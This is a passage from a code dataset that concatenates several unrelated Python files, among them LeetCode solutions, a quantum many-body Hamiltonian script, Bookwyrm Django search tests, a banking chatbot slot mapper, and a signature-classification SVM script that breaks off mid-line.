self.obj27.Drawing_Mode.setValue((' ', 0))\r\n self.obj27.Drawing_Mode.config = 0\r\n self.obj27.Contents.Text.setValue('Generate Code')\r\n self.obj27.Contents.Image.setValue('ERModels/gen.gif')\r\n self.obj27.Contents.lastSelected= \"Image\"\r\n self.obj27.graphClass_= graph_ButtonConfig\r\n if self.genGraphics:\r\n new_obj = graph_ButtonConfig(20.0,140.0,self.obj27)\r\n new_obj.DrawObject(self.UMLmodel)\r\n self.UMLmodel.addtag_withtag(\"ButtonConfig\", new_obj.tag)\r\n new_obj.layConstraints = dict() # Graphical Layout Constraints \r\n new_obj.layConstraints['scale'] = [1.8800000000000006, 0.7799999999999998]\r\n else: new_obj = None\r\n self.obj27.graphObject_ = new_obj\r\n rootNode.addNode(self.obj27)\r\n self.globalAndLocalPostcondition(self.obj27, rootNode)\r\n\r\n self.globalPrecondition( rootNode )\r\n\r\n self.obj28=ButtonConfig(self)\r\n\r\n self.obj28.Action.setValue(('Action', (['Python', 'OCL'], 1), (['PREcondition', 'POSTcondition'], 1), (['EDIT', 'SAVE', 'CREATE', 'CONNECT', 'DELETE', 'DISCONNECT', 'TRANSFORM', 'SELECT', 'DRAG', 'DROP', 'MOVE'], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]), '# The parameters of this method are:\\n# - wherex\\n# - wherey\\n\\nself.modelAttributes()\\n\\n\\n\\n\\n\\n'))\r\n self.obj28.Drawing_Mode.setValue((' ', 0))\r\n self.obj28.Drawing_Mode.config = 0\r\n self.obj28.Contents.Text.setValue('Edit Attributes')\r\n self.obj28.Contents.Image.setValue('ERModels/edit.gif')\r\n self.obj28.Contents.lastSelected= \"Image\"\r\n self.obj28.graphClass_= graph_ButtonConfig\r\n if self.genGraphics:\r\n new_obj = graph_ButtonConfig(20.0,200.0,self.obj28)\r\n new_obj.DrawObject(self.UMLmodel)\r\n self.UMLmodel.addtag_withtag(\"ButtonConfig\", new_obj.tag)\r\n new_obj.layConstraints = dict() # Graphical Layout Constraints \r\n new_obj.layConstraints['scale'] = [1.8800000000000006, 0.7799999999999998]\r\n else: new_obj = None\r\n self.obj28.graphObject_ = new_obj\r\n rootNode.addNode(self.obj28)\r\n self.globalAndLocalPostcondition(self.obj28, rootNode)\r\n self.drawConnections( )\r\n\r\nnewfunction = EntityRelationship_META\r\n\r\nloadedMMName = 'Buttons'\r\n","sub_path":"Assignment4/atom3/Kernel/ERModels/EntityRelationship_META.py","file_name":"EntityRelationship_META.py","file_ext":"py","file_size_in_byte":6210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"139644496","text":"# Time: O(n^2)\n# Space: O(k), k = rowIndex\nclass Solution:\n def getRow(self, rowIndex: 'int') -> 'List[int]':\n if rowIndex < 2:\n return [1] * (rowIndex + 1)\n\n tmp = [1] * (rowIndex + 1)\n for i in range(2, rowIndex + 1):\n for j in range(i-1, 0, -1):\n tmp[j] += tmp[j-1]\n return tmp\n","sub_path":"Python/0119-pascal-triangleII.py","file_name":"0119-pascal-triangleII.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"245860707","text":"\"\"\"\n# Employee info\nclass Employee:\n def __init__(self, id: int, importance: int, subordinates: List[int]):\n # It's the unique id of each node.\n # unique id of this employee\n self.id = id\n # the importance value of this employee\n self.importance = importance\n # the id of direct subordinates\n self.subordinates = subordinates\n\"\"\"\n\nfrom collections import deque\n\n\nclass Solution:\n def getImportanceBFS(self, employees: List['Employee'], id: int) -> int:\n \"\"\"\n https://leetcode.com/problems/employee-importance/\n // Time Complexity : O(n)\n 'n' is the number of employees\n // Space Complexity : O(n)\n // Did this code successfully run on Leetcode : Yes\n // Any problem you faced while coding this : No\n // Three line explanation of solution in plain english :\n - Restructure into { employee_id : Employee Object}\n - Level order traversal\n \"\"\"\n imp = 0\n if not employees:\n return imp\n\n emp = {}\n # restructure data\n for employee in employees:\n emp[employee.id] = employee\n\n # level order traversal\n queue = deque()\n queue.append(id)\n while queue:\n cur = queue.pop()\n imp += emp[cur].importance\n for sub in emp[cur].subordinates:\n queue.append(sub)\n return imp\n\n imp = 0\n emp = {}\n\n def getImportance(self, employees: List['Employee'], id: int) -> int:\n \"\"\"\n https://leetcode.com/problems/employee-importance/\n // Time Complexity : O(n)\n 'n' is the number of employees\n // Space Complexity : O(h)\n Max depth in the employee hierarchy\n // Did this code successfully run on Leetcode : Yes\n // Any problem you faced while coding this : No\n // Three line explanation of solution in plain english :\n - Restructure into { employee_id : Employee Object}\n - Level order traversal\n \"\"\"\n\n if not employees:\n return self.imp\n\n # restructure data\n for employee in employees:\n self.emp[employee.id] = employee\n\n self._helper(id)\n return self.imp\n\n def _helper(self, id):\n\n self.imp += self.emp[id].importance\n\n # logic\n for sub_id in self.emp[id].subordinates:\n self._helper(sub_id)","sub_path":"690_employee_importance.py","file_name":"690_employee_importance.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146106386","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division\nimport math\nimport numpy as np\nimport scipy as sp\nimport pandas\nimport matplotlib.pyplot as plt\nfrom progressbar import ProgressBar\nfrom scipy.sparse import linalg as sparse_linalg\n\nfrom Hamiltonian_Classes import *\nfrom System_Classes import unlocking_System,U1_system\nfrom Symmetry_Classes import *\nfrom Construction_functions import bin_to_int_base_m,int_to_bin_base_m,cycle_bits_state\nfrom Search_functions import find_index_bisection\nfrom State_Classes import zm_state,sym_state,prod_state,bin_state,ref_state\nfrom rw_functions import save_obj,load_obj\nfrom Calculations import level_stats,fidelity,eig_overlap,entropy,site_precession,site_projection,time_evolve_state\n\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Computer Modern'],'size':26})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n# matplotlib.rcParams['figure.dpi'] = 400\n\nN = 12\npxp = unlocking_System([0],\"periodic\",2,N)\npxp.gen_basis()\npxp_syms = model_sym_data(pxp,[translational_general(pxp,order=3)])\n\nV1_ops = dict()\nV1_ops[0] = Hamiltonian(pxp,pxp_syms)\nV1_ops[0].site_ops[1] = np.array([[0,0],[1,0]])\nV1_ops[0].model = np.array([[0,0,1,0]])\nV1_ops[0].model_coef = np.array([1])\nV1_ops[0].gen(uc_size=3,uc_pos=2)\n\nV1_ops[1] = Hamiltonian(pxp,pxp_syms)\nV1_ops[1].site_ops[1] = np.array([[0,0],[1,0]])\nV1_ops[1].model = np.array([[0,1,0,0]])\nV1_ops[1].model_coef = np.array([1])\nV1_ops[1].gen(uc_size=3,uc_pos=1)\n\nV1_ops[2] = Hamiltonian(pxp,pxp_syms)\nV1_ops[2].site_ops[1] = np.array([[0,1],[0,0]])\nV1_ops[2].model = np.array([[0,1,0,0]])\nV1_ops[2].model_coef = np.array([1])\nV1_ops[2].gen(uc_size=3,uc_pos=2)\n\nV1_ops[3] = Hamiltonian(pxp,pxp_syms)\nV1_ops[3].site_ops[1] = np.array([[0,1],[0,0]])\nV1_ops[3].model = np.array([[0,0,1,0]])\nV1_ops[3].model_coef = np.array([1])\nV1_ops[3].gen(uc_size=3,uc_pos=1)\n\nV1 = V1_ops[0]\nfor n in range(1,len(V1_ops)):\n V1=H_operations.add(V1,V1_ops[n],np.array([1,1]))\n\nV2_ops = dict()\nV2_ops[0] = Hamiltonian(pxp,pxp_syms)\nV2_ops[0].site_ops[1] = np.array([[0,0],[1,0]])\nV2_ops[0].model = np.array([[0,1,0,0]])\nV2_ops[0].model_coef = np.array([1])\nV2_ops[0].gen(uc_size=3,uc_pos=0)\n\nV2_ops[1] = Hamiltonian(pxp,pxp_syms)\nV2_ops[1].site_ops[1] = np.array([[0,0],[1,0]])\nV2_ops[1].model = np.array([[0,0,1,0]])\nV2_ops[1].model_coef = np.array([1])\nV2_ops[1].gen(uc_size=3,uc_pos=0)\n\nV2 = V2_ops[0]\nfor n in range(1,len(V2_ops)):\n V2=H_operations.add(V2,V2_ops[n],np.array([1,1]))\n\nV3_ops = dict()\nV3_ops[0] = Hamiltonian(pxp,pxp_syms)\nV3_ops[0].site_ops[1] = np.array([[0,0],[1,0]])\nV3_ops[0].site_ops[2] = np.array([[0,1],[0,0]])\nV3_ops[0].model = np.array([[0,2,1,2,0]])\nV3_ops[0].model_coef = np.array([1])\nV3_ops[0].gen(uc_size=3,uc_pos=2)\n\nV3_ops[1] = Hamiltonian(pxp,pxp_syms)\nV3_ops[1].site_ops[1] = np.array([[0,0],[1,0]])\nV3_ops[1].site_ops[2] = np.array([[0,1],[0,0]])\nV3_ops[1].model = np.array([[0,2,1,2,0]])\nV3_ops[1].model_coef = np.array([1])\nV3_ops[1].gen(uc_size=3,uc_pos=0)\n\nV3 = V3_ops[0]\nfor n in range(1,len(V3_ops)):\n V3=H_operations.add(V3,V3_ops[n],np.array([1,1]))\n\nHp0_ops = dict()\nHp0_ops[0] = Hamiltonian(pxp,pxp_syms)\nHp0_ops[0].site_ops[1] = np.array([[0,1],[0,0]])\nHp0_ops[0].model = np.array([[0,1,0]])\nHp0_ops[0].model_coef = np.array([1])\nHp0_ops[0].gen(uc_size=3,uc_pos=2)\n\nHp0_ops[1] = Hamiltonian(pxp,pxp_syms)\nHp0_ops[1].site_ops[1] = np.array([[0,0],[1,0]])\nHp0_ops[1].model = np.array([[0,1,0]])\nHp0_ops[1].model_coef = np.array([1])\nHp0_ops[1].gen(uc_size=3,uc_pos=0)\n\nHp0_ops[2] = Hamiltonian(pxp,pxp_syms)\nHp0_ops[2].site_ops[1] = np.array([[0,0],[1,0]])\nHp0_ops[2].model = np.array([[0,1,0]])\nHp0_ops[2].model_coef = np.array([1])\nHp0_ops[2].gen(uc_size=3,uc_pos=1)\n\nHp0 = Hp0_ops[0]\nfor n in range(1,len(Hp0_ops)):\n Hp0=H_operations.add(Hp0,Hp0_ops[n],np.array([1,1]))\n\ncoef = np.array([0.18243653,-0.10390499,0.054452])\nHp = H_operations.add(Hp0,V1,np.array([1,coef[0]]))\nHp = H_operations.add(Hp,V2,np.array([1,coef[1]]))\nHp = H_operations.add(Hp,V3,np.array([1,coef[2]]))\n# Hp = Hp0.sector.matrix()\nHp=Hp.sector.matrix()\nHm = np.conj(np.transpose(Hp))\n\n#generate perturbed Hamiltonian\nV1_ops = dict()\nV1_ops[0] = Hamiltonian(pxp,pxp_syms)\nV1_ops[0].site_ops[1] = np.array([[0,1],[1,0]])\nV1_ops[0].model = np.array([[0,1,0,0]])\nV1_ops[0].model_coef = np.array([1])\nV1_ops[0].gen(uc_size=3,uc_pos=1)\n\nV1_ops[1] = Hamiltonian(pxp,pxp_syms)\nV1_ops[1].site_ops[1] = np.array([[0,1],[1,0]])\nV1_ops[1].model = np.array([[0,0,1,0]])\nV1_ops[1].model_coef = np.array([1])\nV1_ops[1].gen(uc_size=3,uc_pos=2)\n\nV1_ops[2] = Hamiltonian(pxp,pxp_syms)\nV1_ops[2].site_ops[1] = np.array([[0,1],[1,0]])\nV1_ops[2].model = np.array([[0,1,0,0]])\nV1_ops[2].model_coef = np.array([1])\nV1_ops[2].gen(uc_size=3,uc_pos=2)\n\nV1_ops[3] = Hamiltonian(pxp,pxp_syms)\nV1_ops[3].site_ops[1] = np.array([[0,1],[1,0]])\nV1_ops[3].model = np.array([[0,0,1,0]])\nV1_ops[3].model_coef = np.array([1])\nV1_ops[3].gen(uc_size=3,uc_pos=1)\n\nV1 = V1_ops[0]\nfor n in range(1,len(V1_ops)):\n V1=H_operations.add(V1,V1_ops[n],np.array([1,1]))\n\nV2_ops = dict()\nV2_ops[0] = Hamiltonian(pxp,pxp_syms)\nV2_ops[0].site_ops[1] = np.array([[0,1],[1,0]])\nV2_ops[0].model = np.array([[0,0,1,0]])\nV2_ops[0].model_coef = np.array([1])\nV2_ops[0].gen(uc_size=3,uc_pos=0)\n\nV2_ops[1] = Hamiltonian(pxp,pxp_syms)\nV2_ops[1].site_ops[1] = np.array([[0,1],[1,0]])\nV2_ops[1].model = np.array([[0,1,0,0]])\nV2_ops[1].model_coef = np.array([1])\nV2_ops[1].gen(uc_size=3,uc_pos=0)\n\nV2 = V2_ops[0]\nfor n in range(1,len(V2_ops)):\n V2=H_operations.add(V2,V2_ops[n],np.array([1,1]))\n\nV3_ops = dict()\nV3_ops[0] = Hamiltonian(pxp,pxp_syms)\nV3_ops[0].site_ops[1] = np.array([[0,1],[1,0]])\nV3_ops[0].model = np.array([[0,1,1,1,0]])\nV3_ops[0].model_coef = np.array([1])\nV3_ops[0].gen(uc_size=3,uc_pos=0)\n\nV3_ops[1] = Hamiltonian(pxp,pxp_syms)\nV3_ops[1].site_ops[1] = np.array([[0,1],[1,0]])\nV3_ops[1].model = np.array([[0,1,1,1,0]])\nV3_ops[1].model_coef = np.array([1])\nV3_ops[1].gen(uc_size=3,uc_pos=2)\n\nV3 = V3_ops[0]\nfor n in range(1,len(V3_ops)):\n V3=H_operations.add(V3,V3_ops[n],np.array([1,1]))\n\nH0 = spin_Hamiltonian(pxp,\"x\",pxp_syms)\nH0.gen()\nH = H_operations.add(H0,V1,np.array([1,coef[0]]))\nH = H_operations.add(H,V2,np.array([1,coef[1]]))\nH = H_operations.add(H,V3,np.array([1,coef[2]]))\n# H=H0\nH.sector.find_eig()\n\ntemp = Hp + Hm\ndef com(a,b):\n return np.dot(a,b)-np.dot(b,a)\nHz = 1/2*com(Hp,Hm)\ne,u = np.linalg.eigh(Hz)\nfrom Diagnostics import print_wf\nprint(e[0])\nprint_wf(u[:,0],pxp,1e-2)\nprint(\"\\n\")\nprint_wf(u[:,np.size(u,axis=1)-1],pxp,1e-2)\nprint(e)\n\nz=zm_state(3,1,pxp)\nfsa_basis = z.prod_basis()\ncurrent_state = fsa_basis\nfsa_dim = int(2*pxp.N/3)\nfor n in range(0,fsa_dim):\n next_state = np.dot(Hp,current_state)\n next_state = next_state / np.power(np.vdot(next_state,next_state),0.5)\n fsa_basis = np.vstack((fsa_basis,next_state))\n current_state = next_state\nfsa_basis = np.transpose(fsa_basis)\n\nfrom Calculations import gen_krylov_basis\nkrylov_basis = gen_krylov_basis(H.sector.matrix(),int(2*pxp.N/3),z.prod_basis(),pxp,orth=\"gs\")\n\nH2 = np.dot(H.sector.matrix(),H.sector.matrix())\nH2_fsa = np.dot(np.conj(np.transpose(fsa_basis)),np.dot(H2,fsa_basis))\nH_fsa = np.dot(np.conj(np.transpose(fsa_basis)),np.dot(H.sector.matrix(),fsa_basis))\n# H_krylov = np.dot(np.conj(np.transpose(krylov_basis)),np.dot(H.sector.matrix(),krylov_basis))\n# e,u = np.linalg.eigh(H_fsa)\n# ek,uk = np.linalg.eigh(H_krylov)\n# fsa_overlap = np.log10(np.abs(u[0,:])**2)\n# krylov_overlap = np.log10(np.abs(uk[0,:])**2)\n\n# eig_overlap(z,H).plot()\n# plt.scatter(ek,krylov_overlap,marker=\"x\",s=100,color=\"red\",label=\"Krylov\")\n# plt.scatter(e,fsa_overlap,marker=\"D\",s=100,alpha=0.6,label=\"FSA\")\n# plt.legend()\n# plt.xlabel(r\"$E$\")\n# plt.ylabel(r\"$\\log(\\vert \\psi \\vert E \\rangle \\vert^2)$\")\n# plt.title(r\"$PXP + \\lambda_i V_i$, $Z_3$ Scar approximations, $N=$\"+str(pxp.N))\n# plt.show()\n\n# u_comp = np.dot(fsa_basis,u)\n# u_compk = np.dot(fsa_basis,uk)\n# exact_overlap = np.zeros(np.size(e))\n# for n in range(0,np.size(e,axis=0)):\n # max_overlap = 0\n # for m in range(0,np.size(H.sector.eigvectors(),axis=1)):\n # temp = np.abs(np.vdot(u_comp[:,n],H.sector.eigvectors()[:,m]))**2\n # if temp > max_overlap:\n # max_overlap = temp\n # exact_overlap[n] = max_overlap\n\n# exact_overlapk = np.zeros(np.size(ek))\n# for n in range(0,np.size(ek,axis=0)):\n # max_overlap = 0\n # for m in range(0,np.size(H.sector.eigvectors(),axis=1)):\n # temp = np.abs(np.vdot(u_compk[:,n],H.sector.eigvectors()[:,m]))**2\n # if temp > max_overlap:\n # max_overlap = temp\n # exact_overlapk[n] = max_overlap\n\n# plt.plot(ek,exact_overlapk,marker=\"s\",label=\"Krylov\")\n# plt.plot(e,exact_overlap,marker=\"s\",label=\"FSA\")\n# plt.legend()\n# plt.xlabel(r\"$E$\")\n# plt.ylabel(r\"$\\vert \\langle \\psi_{approx} \\vert \\psi_{exact} \\rangle \\vert^2$\")\n# plt.title(r\"$PXP + \\lambda_i V_i$, $Z_3$ Scar approximations, $N=$\"+str(pxp.N))\n# plt.show()\n \n\n","sub_path":"projects/z3_pxp_pertubations/z3_pert_fsa.py","file_name":"z3_pert_fsa.py","file_ext":"py","file_size_in_byte":9054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"67661811","text":"\"\"\" test for app action functionality \"\"\"\nimport json\nimport pathlib\nfrom unittest.mock import patch\n\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.http import JsonResponse\nfrom django.template.response import TemplateResponse\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\nimport responses\n\nfrom bookwyrm import models, views\nfrom bookwyrm.settings import DOMAIN\n\n\nclass Views(TestCase):\n \"\"\"tag views\"\"\"\n\n def setUp(self):\n \"\"\"we need basic test data and mocks\"\"\"\n self.factory = RequestFactory()\n with patch(\"bookwyrm.suggested_users.rerank_suggestions_task.delay\"), patch(\n \"bookwyrm.activitystreams.populate_stream_task.delay\"\n ):\n self.local_user = models.User.objects.create_user(\n \"mouse@local.com\",\n \"mouse@mouse.com\",\n \"mouseword\",\n local=True,\n localname=\"mouse\",\n remote_id=\"https://example.com/users/mouse\",\n )\n self.work = models.Work.objects.create(title=\"Test Work\")\n self.book = models.Edition.objects.create(\n title=\"Test Book\",\n remote_id=\"https://example.com/book/1\",\n parent_work=self.work,\n )\n models.SiteSettings.objects.create()\n\n def test_search_json_response(self):\n \"\"\"searches local data only and returns book data in json format\"\"\"\n view = views.Search.as_view()\n request = self.factory.get(\"\", {\"q\": \"Test Book\"})\n with patch(\"bookwyrm.views.search.is_api_request\") as is_api:\n is_api.return_value = True\n response = view(request)\n self.assertIsInstance(response, JsonResponse)\n\n data = json.loads(response.content)\n self.assertEqual(len(data), 1)\n self.assertEqual(data[0][\"title\"], \"Test Book\")\n self.assertEqual(data[0][\"key\"], f\"https://{DOMAIN}/book/{self.book.id}\")\n\n def test_search_no_query(self):\n \"\"\"just the search page\"\"\"\n view = views.Search.as_view()\n # we need a connector for this, sorry\n request = self.factory.get(\"\")\n with patch(\"bookwyrm.views.search.is_api_request\") as is_api:\n is_api.return_value = False\n response = view(request)\n self.assertIsInstance(response, TemplateResponse)\n response.render()\n\n @responses.activate\n def test_search_books(self):\n \"\"\"searches remote connectors\"\"\"\n view = views.Search.as_view()\n\n models.Connector.objects.create(\n identifier=\"example.com\",\n connector_file=\"openlibrary\",\n base_url=\"https://example.com\",\n books_url=\"https://example.com/books\",\n covers_url=\"https://example.com/covers\",\n search_url=\"https://example.com/search?q=\",\n )\n datafile = pathlib.Path(__file__).parent.joinpath(\"../data/ol_search.json\")\n search_data = json.loads(datafile.read_bytes())\n responses.add(\n responses.GET, \"https://example.com/search?q=Test%20Book\", json=search_data\n )\n\n request = self.factory.get(\"\", {\"q\": \"Test Book\", \"remote\": True})\n request.user = self.local_user\n with patch(\"bookwyrm.views.search.is_api_request\") as is_api:\n is_api.return_value = False\n response = view(request)\n self.assertIsInstance(response, TemplateResponse)\n response.render()\n connector_results = response.context_data[\"results\"]\n self.assertEqual(len(connector_results), 2)\n self.assertEqual(connector_results[0][\"results\"][0].title, \"Test Book\")\n self.assertEqual(\n connector_results[1][\"results\"][0].title,\n \"This Is How You Lose the Time War\",\n )\n\n # don't search remote\n request = self.factory.get(\"\", {\"q\": \"Test Book\", \"remote\": True})\n anonymous_user = AnonymousUser\n anonymous_user.is_authenticated = False\n request.user = anonymous_user\n with patch(\"bookwyrm.views.search.is_api_request\") as is_api:\n is_api.return_value = False\n response = view(request)\n self.assertIsInstance(response, TemplateResponse)\n response.render()\n connector_results = response.context_data[\"results\"]\n self.assertEqual(len(connector_results), 1)\n self.assertEqual(connector_results[0][\"results\"][0].title, \"Test Book\")\n\n def test_search_users(self):\n \"\"\"searches remote connectors\"\"\"\n view = views.Search.as_view()\n request = self.factory.get(\"\", {\"q\": \"mouse\", \"type\": \"user\"})\n request.user = self.local_user\n response = view(request)\n\n self.assertIsInstance(response, TemplateResponse)\n response.render()\n self.assertEqual(response.context_data[\"results\"][0], self.local_user)\n\n def test_search_users_logged_out(self):\n \"\"\"searches remote connectors\"\"\"\n view = views.Search.as_view()\n request = self.factory.get(\"\", {\"q\": \"mouse\", \"type\": \"user\"})\n\n anonymous_user = AnonymousUser\n anonymous_user.is_authenticated = False\n request.user = anonymous_user\n\n response = view(request)\n\n response.render()\n self.assertFalse(\"results\" in response.context_data)\n\n def test_search_lists(self):\n \"\"\"searches remote connectors\"\"\"\n with patch(\"bookwyrm.models.activitypub_mixin.broadcast_task.delay\"):\n booklist = models.List.objects.create(\n user=self.local_user, name=\"test list\"\n )\n view = views.Search.as_view()\n request = self.factory.get(\"\", {\"q\": \"test\", \"type\": \"list\"})\n request.user = self.local_user\n response = view(request)\n\n self.assertIsInstance(response, TemplateResponse)\n response.render()\n self.assertEqual(response.context_data[\"results\"][0], booklist)\n","sub_path":"bookwyrm/tests/views/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"369018243","text":"\"\"\"\nThe init script for create Page table in Postgres Database\n\"\"\"\n\nfrom sqlalchemy import Column, MetaData, String, Table\nfrom sqlalchemy.dialects.postgresql import TSVECTOR\n\nfrom metadata.session import get_engine\n\n\nmdata = MetaData()\n\npages_table = Table('pages', mdata,\n Column('url', String, primary_key=True),\n Column('content', TSVECTOR))\n\n\nif __name__ == '__main__':\n engine = get_engine()\n mdata.create_all(engine)\n","sub_path":"v2.0/metadata/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"334356767","text":"# -----------------------------------------------------------\n# demonstrates how to map mandatory parameters for api call\n#\n# (C) 2019 Discover Bank, USA\n# Released under GNU Public License (GPL)\n# email rahulsawriya@discover.com\n# -----------------------------------------------------------\nfrom datetime import datetime\nfrom scripts.operations import Jsonops\n#from operations import Jsonops\nclass Case:\n def slot_ops(self, acct_cat, mon_type, post_amt, post_date, brand_new, waiver, late_time, on_time, category, accountTypeTransfer, balanceTransferType, cycle_type, payment_type, cred):\n tran_code = None\n tran_code_extn = None\n if post_date is None: post_date = datetime.today().strftime('%Y%m%d')\n if acct_cat in(\"Discover IT\",\"discover IT\", \"Discover it\",\"discoverIt\", \"discover it\",\"IT\",\"it\",\"It\"):\n termlevel, option_code, external_status, act_lvl_code, card_type = \"28\", \"31\", \"R\", \"3\", \"000001\"\n print(acct_cat)\n if acct_cat in(\"Non IT\",\"non IT\",\"Non IT\",\"Non it\",\"Non It\",\"non it\",\"Consumer\",\"consumer\",\"Discover\",\"discover\"):\n termlevel, option_code, external_status, act_lvl_code, card_type = \"28\", \"30\", \"R\", \"3\", \"000001\"\n print(acct_cat)\n if acct_cat in(\"SBC\",\"Sbc\",\"sbc\"):\n termlevel, option_code, external_status, act_lvl_code, card_type = \"26\", \"26\", \"R\", \"3\", \"000012\"\n print(acct_cat)\n if acct_cat in(\"Corp\",\"CORP\",\"corp\"):\n termlevel, option_code, external_status, act_lvl_code, card_type = \"01\", \"06\", \"R\", \"3\", \"000002\"\n print(acct_cat)\n if acct_cat in(\"Non sbc\", \"Non Sbc\", \"NON SBC\", \"non sbc\", \"Non SBC\"):\n termlevel, option_code, external_status, act_lvl_code, card_type = \"28\", \"30\", \"R\", \"3\", \"000001\"\n print(acct_cat)\n if acct_cat is None:\n termlevel, option_code, external_status, act_lvl_code, card_type = \"28\", \"30\", \"R\", \"3\", \"000001\"\n print(acct_cat)\n if mon_type in(\"Payment\",\"payment\") or payment_type in(\"Payment\",\"payment\"):\n tran_code, tran_code_extn = \"1710\", \"001001\"\n print(mon_type)\n print(acct_cat)\n #if payment_type in(\"Payment\",\"payment\") or payment_type in(\"return\",\"Return\"):\n if payment_type in(\"return\",\"Return\"):\n tran_code, tran_code_extn = \"1712\", \"004753\"\n if mon_type in(\"SALE\",\"Sale\",\"sale\",\"sales\",\"Sales\", \"purchase\",\"Purchase\"):\n tran_code, tran_code_extn = \"1720\", \"001001\"\n print(mon_type)\n if mon_type in(\"cash\",\"Cash\",\"CASH\",\"cash advance\",\"Cash Advance\"):\n tran_code, tran_code_extn = \"1700\", \"003001\"\n print(mon_type)\n if mon_type in(\"return\",\"Return\"):\n tran_code, tran_code_extn = \"1730\", \"001001\"\n #transaction_date = tracker.get_slot('transaction_date')\n #post_proc_date = tracker.get_slot('post_proc_date')\n print(mon_type)\n if cycle_type == \"backdated sales\" or cycle_type == \"cross cycle sales\":\n tran_code, tran_code_extn = \"1720\", \"001001\"\n return [termlevel, option_code, external_status, act_lvl_code, card_type, tran_code, tran_code_extn, post_amt, brand_new, waiver, late_time, on_time, category, accountTypeTransfer, balanceTransferType, cycle_type, payment_type, cred]\n \n def mon_cases(self, acct_cat, mon_type, post_amt, post_date, brand_new, waiver, late_time, on_time, category, accountTypeTransfer, balanceTransferType, cycle_type, payment_type, cred):\n val = self.slot_ops(acct_cat, mon_type, post_amt, post_date, brand_new, waiver, late_time, on_time, category, accountTypeTransfer, balanceTransferType, cycle_type, payment_type, cred)\n x = Jsonops()\n data = x.json_process(val)\n return data\n \n \n#obj = Case()\n#obj.slot_ops(\"non IT\", \"sales\", 23, 20192013)\n#obj.mon_cases(\"non IT\", \"sales\", 23, 20192013)\n","sub_path":"chatbot/rasa/scripts/cases.py","file_name":"cases.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"513332970","text":"#! /usr/bin/python\n\n#Copy from Yijie's tool\nimport numpy as np\nimport json\nfrom matplotlib import (pyplot as plt, patches as patches)\nfrom PIL import Image # pip install pillow\nfrom skimage.filters import threshold_local # pip install scikit-image\nimport os\nfrom os import path\nimport pandas as pd\nfrom PIL import Image\nfrom resizeimage import resizeimage\nfrom sklearn.svm import SVC\nfrom sklearn import datasets\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import reciprocal, uniform\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom sklearn.model_selection import train_test_split\n# area of bounding box\ndef rotate_bbox_area(img, deg):\n box = img.rotate(deg, expand=True).getbbox()\n return (box[3] - box[1]) * (box[2] - box[0])\n \ndef rotate_crop(img, deg, padding=0):\n img_rotate = img.rotate(deg, expand=True, resample=Image.BILINEAR)\n box = img_rotate.getbbox()\n if padding > 0:\n box = np.asarray(box) + [-padding, -padding, +padding, +padding]\n return img_rotate.crop(box)\n\n\ntol_deg = 10\n# smallest bounding box wihin -10~10 degrees rotation\ndef opt_rotate(img, padding=0):\n opt_deg = np.argmin(\n [rotate_bbox_area(img, i) for i in range(-tol_deg,tol_deg+1)]\n ) - tol_deg\n return rotate_crop(img, opt_deg, padding)\n\n# downsampling\ndef img_reduce(img, side=28, mode=Image.ANTIALIAS):\n h = side + 1 \n w = int(side * img.width / img.height) + 1\n img_reduced = img.copy()\n # the reduced image size is (w-1, h-1)\n img_reduced.thumbnail((w, h), mode)\n return img_reduced\n\n\n# convert PIL.Image object to numpy.Array, for training\ndef img2arr(img):\n return np.asarray(img.getdata(), dtype=np.uint8).reshape(img.height, img.width, -1)\n\n\n# convert binarized image to gray-scale image with alpha channel\ndef bin2LA(bin_img):\n mask = np.uint8(255 * (False == bin_img))\n box = Image.fromarray(mask).getbbox()\n LA_img = np.concatenate((np.uint8(255 * bin_img)[:,:,None], mask[:,:,None]), axis=2)\n LA_img = Image.fromarray(LA_img).convert('LA')\n return LA_img.crop(box)\n\n\n# process single signature with transparent background\ndef process_one(img):\n return img_reduce(opt_rotate(img, padding=1).convert('LA'))\n\n\n# train the data set to find the best parameters used in SVM\ndef train():\n file = pd.read_csv(\"png.csv\")\n X=[] #The list of pictures\n y=[] #The list of the label\n for index, row in file.iterrows():\n file_path = path.relpath(row['path'])\n img = Image.open(file_path).convert('LA')\n img_reduced = process_one(img)\n img_reduced = img_reduced.resize((28,28))\n Twod_array = np.asarray(img_reduced)\n Oned_array = Twod_array.ravel()\n Oned_array = Oned_array.astype(np.float64)\n X.append(list(Oned_array))\n y.append(row['type'])\n\n X = np.asarray(X)\n\n genuine_or_forged = {\"genuine\":True, \"forged\":False}\n y = list(map(lambda x :genuine_or_forged[x] ,y))\n #Training set and Testing test shuffling\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, random_state=44)\n #Randomized Search\n svm_clf = SVC(kernel=\"linear\", C=float(\"inf\"))\n param_distributions = {\"gamma\": reciprocal(0.001, 0.1), \"C\": uniform(1, 10)}\n rnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10, verbose=2)\n rnd_search_cv.fit(X,y)\n svm_clf = rnd_search_cv.best_estimator_\n svm_clf.fit(X_train, y_train)\n predicted = svm_clf.predict(X_test) \n print(\"Test set score: 